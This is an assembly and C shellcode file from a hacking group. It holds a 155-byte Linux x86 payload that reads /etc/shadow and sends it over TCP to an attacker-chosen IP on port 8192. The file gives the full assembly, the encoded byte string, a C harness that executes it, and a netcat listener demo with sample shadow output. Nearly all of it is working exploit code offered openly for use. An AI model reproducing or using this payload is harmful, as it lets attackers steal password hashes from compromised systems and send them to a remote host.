; (C)oDed by 0in ; Dark-Coders Group Productions ; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode] ; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<< ; Contact: 0in[dot]email[at]gmail[dot]com ; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned ; Compile: ; nasm -f elf shellcode.asm ; ld -o shellcode shellcode.o ; How it works!? ; (1st console) [root@13world]# ./shellcode ; (2nd console) 0in[~]%> nc -v -l -p 8192 ; (2nd console) ;Connection from 127.0.0.1:48820 ;root:[password here]:13896:::::: ;bin:x:0:::::: ;daemon:x:0:::::: ;mail:x:0:::::: ;ftp:x:0:::::: ;nobody:x:0:::::: ;dbus:!:13716:0:99999:7::: ;zer0in:[password here]:13716:0:99999:7::: ;avahi:!:13716:0:99999:7::: ;hal:!:13716:0:99999:7::: ;clamav:!:13735:0:99999:7::: ;fetchmail:!:13737:0:99999:7::: ;mysql:!:12072:0:99999:7::: ;postfix:!:13798:0:99999:7::: ;mpd:!:13828:0:99999:7::: ;nginx:!:13959:0:99999:7::: ;tomcat:!:14063:0:99999:7::: ;http:!:14075:0:99999:7::: ;snort:!:14075:0:99999:7::: ;The code (Assembler version): Section .text global _start _start: ;open(file,O_RDONLY): xor ebx,ebx push byte 0x77 ;/etc/shadow push word 0x6f64 push 0x6168732f push 0x6374652f; ---------- mov ebx,esp ; first arg - filename xor ax,ax inc ax inc ax inc ax inc ax inc ax ; ax = 5 (O_RDONLY) int 0x80 mov ebx,eax ;read(file,buff,1222): xor ax,ax inc ax inc ax inc ax ; syscall id = 3 mov dx,1222 ; size to read push esp mov ecx,[esp] ; memory int 0x80 mov esi,eax ; file to ESI ;socket(PF_INET,SOCK_STREAM,IPPROTO_IP) xor ebx,ebx push ebx ;0 ; 3rd arg inc ebx push ebx ;1 ; 2nd arg inc ebx push ebx ;2 ; 1st arg ;socketcall() mov ax,1666 ;-------------- sub ax,1564 ;-------------- xor bx,bx ; socket() call id inc bx ;- - - - - - - - - mov ecx,esp ; socket() int 0x80 ; do it! pop ebx; clear mem ;connect(eax,struct server,16) ;16 - sizeof struct sockaddr mov edx, eax xor ebx,ebx xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP) push ebx mov bx,1666 ; definition of struct sockaddr sub bx,1634 ;we cant stay 0x00 here (8192 PORT) push bx mov al, 2 ; push ax mov ecx, esp mov al, 16 push eax push ecx push edx mov al, 102 mov bx,1666 sub bx,1663 ;--------------------------------- mov ecx, esp int 0x80 ; call connect mov ebx,eax ; socket to ebx ; Ok! so... ; Lets write file to server and go down! ;write(socket,file,1222) pop ebx mov ax,1666 sub ax,1662 push esi mov dx,16666 sub dx,15444 int 0x80 ;exit(1) : xor eax,eax ;---------- inc eax mov ebx,eax ;---------- int 0x80 ; do it! ;C: ; #include ; char shellcode[]="\x31\xdb" ; "\x6a\x77" ; "\x66\x68\x64\x6f" ; "\x68\x2f\x73\x68\x61" ; "\x68\x2f\x65\x74\x63" ; "\x89\xe3" ; "\x66\x31\xc0" ; "\x66\x40" ; "\x66\x40" ; "\x66\x40" ; "\x66\x40" ; "\x66\x40" ; "\xcd\x80" ; "\x89\xc3" ; "\x66\x31\xc0" ; "\x66\x40" ; "\x66\x40" ; "\x66\x40" ; "\x66\xba\xc6\x04" ; "\x54" ; "\x8b\x0c\x24" ; "\xcd\x80" ; "\x89\xc6" ; "\x31\xdb" ; "\x53" ; "\x43" ; "\x53" ; "\x43" ; "\x53" ; "\x66\xb8\x82\x06" ; "\x66\x2d\x1c\x06" ; "\x66\x31\xdb" ; "\x66\x43" ; "\x89\xe1" ; "\xcd\x80" ; "\x5b" ; "\x89\xc2" ; "\x31\xdb" ; "\x53" ; "\x66\xbb\x82\x06" ; "\x66\x81\xeb\x62\x06" ; "\x66\x53" ; "\xb0\x02" ; "\x66\x50" ; "\x89\xe1" ; "\xb0\x10" ; "\x50" ; "\x51" ; "\x52" ; "\xb0\x66" ; "\x66\xbb\x82\x06" ; "\x66\x81\xeb\x7f\x06" ; "\x89\xe1" ; "\xcd\x80" ; "\x89\xc3" ; "\x5b" ; "\x66\xb8\x82\x06" ; "\x66\x2d\x7e\x06" ; "\x56" ; "\x66\xba\x1a\x41" ; "\x66\x81\xea\x54\x3c" ; "\xcd\x80" ; "\x31\xc0" ; "\x40" ; "\x89\xc3" ; "\xcd\x80"; ; int main(int argc, char **argv) ; { ; int *ret; ; ret = (int *)&ret + 2; ; (*ret) = (int) shellcode; ; }